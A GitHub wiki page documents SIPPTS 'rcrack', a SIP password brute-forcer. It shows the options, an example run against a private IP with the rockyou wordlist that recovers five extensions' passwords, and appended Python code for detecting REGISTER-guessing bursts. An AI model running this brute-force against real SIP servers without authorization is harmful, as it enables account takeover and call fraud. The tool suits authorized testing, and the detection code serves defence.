Command rcrack - Pepelux/sippts GitHub Wiki

SIPPTS rcrack is a remote password cracker for SIP services. Rcrack can test passwords for several users across different IPs and port ranges.

Features

Rcrack allows us to:

  • Remotely test a list of users and passwords using the REGISTER method.
  • Test users and passwords on a network range.
  • Use a prefix for the extension range (the user and the extension may not be the same).
  • Connect via the UDP, TCP or TLS protocol.
  • Resume a previous session.
  • Analyze responses using verbose mode.
  • Customize the User-Agent.

Usage

$ sippts rcrack -h

Target:
  -i IP|HOST          Target IP address
  -r REMOTE_PORT      Remote port (default: 5060)
  -e EXTEN            Extensions or users to attack. Ex: 100 | 100,102,105 | 100-200 | user100
  -au AUTH_USER       Use a custom SIP Auth User instead the extension
  -p PROTOCOL         Protocol: udp|tcp|tls (default: udp)
  -proxy IP:PORT      Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)

Words:
  -pr PREFIX          Prefix for extensions, used for authentication
  -l LENGHT           Lenght of the extensions (if set, left padding with 0's)
  -w WORDLIST         Wordlist for bruteforce

Headers:
  -d DOMAIN           SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
  -cd CONTACT_DOMAIN  Domain or IP address for Contact header. Ex: 10.0.1.2
  -ua USER_AGENT      User-Agent header (default: pplsip)

Log:
  -v                  Increase verbosity
  -nocolor            Show result without colors

Other options:
  -th THREADS         Number of threads (default: 200)
  -h, --help          Show this help

Example

$ sippts rcrack -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt


Press Ctrl+C to stop


[!] IP/Network: 192.168.2.203
[!] Port: 5080
[!] Exten range: 100,101,103-105
[!] Protocol: UDP
[!] Total threads: 5
[!] Wordlist: wordlist/rockyou.txt

[|] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 103/123456 - 200 OK
Password for user 103 found: 123456
[/] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 100/123123 - 200 OK
Password for user 100 found: 123123
[/] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 105/secret - 200 OK
Password for user 105 found: secret
[/] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 101/666666 - 200 OK
Password for user 101 found: 666666
[|] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 104/passw0rd - 200 OK
Password for user 104 found: passw0rd
 ------------------------------------------------
| IP address    | Port | Proto | User | Password |
 ------------------------------------------------
| 192.168.2.203 | 5080 | UDP   | 100  | 123123   |
| 192.168.2.203 | 5080 | UDP   | 101  | 666666   |
| 192.168.2.203 | 5080 | UDP   | 103  | 123456   |
| 192.168.2.203 | 5080 | UDP   | 104  | passw0rd |
| 192.168.2.203 | 5080 | UDP   | 105  | secret   |
 ------------------------------------------------
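
On the server side, a run like the one above shows up as a burst of failed REGISTER transactions from one client across several extensions, sometimes ending in a 200 OK. The following is an added example, not part of SIPPTS or this wiki: it counts 401/403 REGISTER responses per client and user over constructed sample responses; the addresses, the `pbx.example` domain, the function name and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: (client IP, SIP response the server sent back to it).
def _resp(status, user, cseq):
    reason = {200: "OK", 401: "Unauthorized"}[status]
    return (f"SIP/2.0 {status} {reason}\r\n"
            f"To: <sip:{user}@pbx.example>;tag=a1\r\n"
            f"CSeq: {cseq} REGISTER\r\n\r\n")

SAMPLE = (
    # A phone registering normally: one challenge, then success.
    [("10.0.0.20", _resp(401, "200", 1)), ("10.0.0.20", _resp(200, "200", 2))]
    # Constructed guessing run: repeated failures on extensions 100 and 101.
    + [("10.0.0.66", _resp(401, u, n)) for u in ("100", "101") for n in range(1, 13)]
    + [("10.0.0.66", _resp(200, "101", 13))]
)

STATUS_RE = re.compile(r"^SIP/2\.0 (\d{3}) ")
TO_USER_RE = re.compile(r"^(?:To|t):.*?sips?:([^@;>]+)@", re.I | re.M)
CSEQ_RE = re.compile(r"^CSeq:\s*\d+\s+(\w+)", re.I | re.M)

def detect_register_guessing(events, max_failures=10):
    """Return {client_ip: {"failures": {user: n}, "hit_after_failures": [user]}}
    for clients whose failed REGISTERs for any one user exceed max_failures."""
    failures = defaultdict(lambda: defaultdict(int))
    hits = defaultdict(list)
    for client, msg in events:
        status, user, cseq = STATUS_RE.match(msg), TO_USER_RE.search(msg), CSEQ_RE.search(msg)
        if not (status and user and cseq) or cseq.group(1).upper() != "REGISTER":
            continue  # not a parsable response to a REGISTER
        code, name = int(status.group(1)), user.group(1)
        if code in (401, 403):
            failures[client][name] += 1
        elif code == 200 and failures[client][name] > max_failures:
            hits[client].append(name)  # success right after a failure burst
    return {
        c: {"failures": dict(f), "hit_after_failures": hits[c]}
        for c, f in failures.items()
        if max(f.values()) > max_failures
    }
```

The User-Agent is not used as a signal here because `-ua` lets the caller replace the default `pplsip`; the threshold has to sit above the single 401 challenge that every normal registration produces.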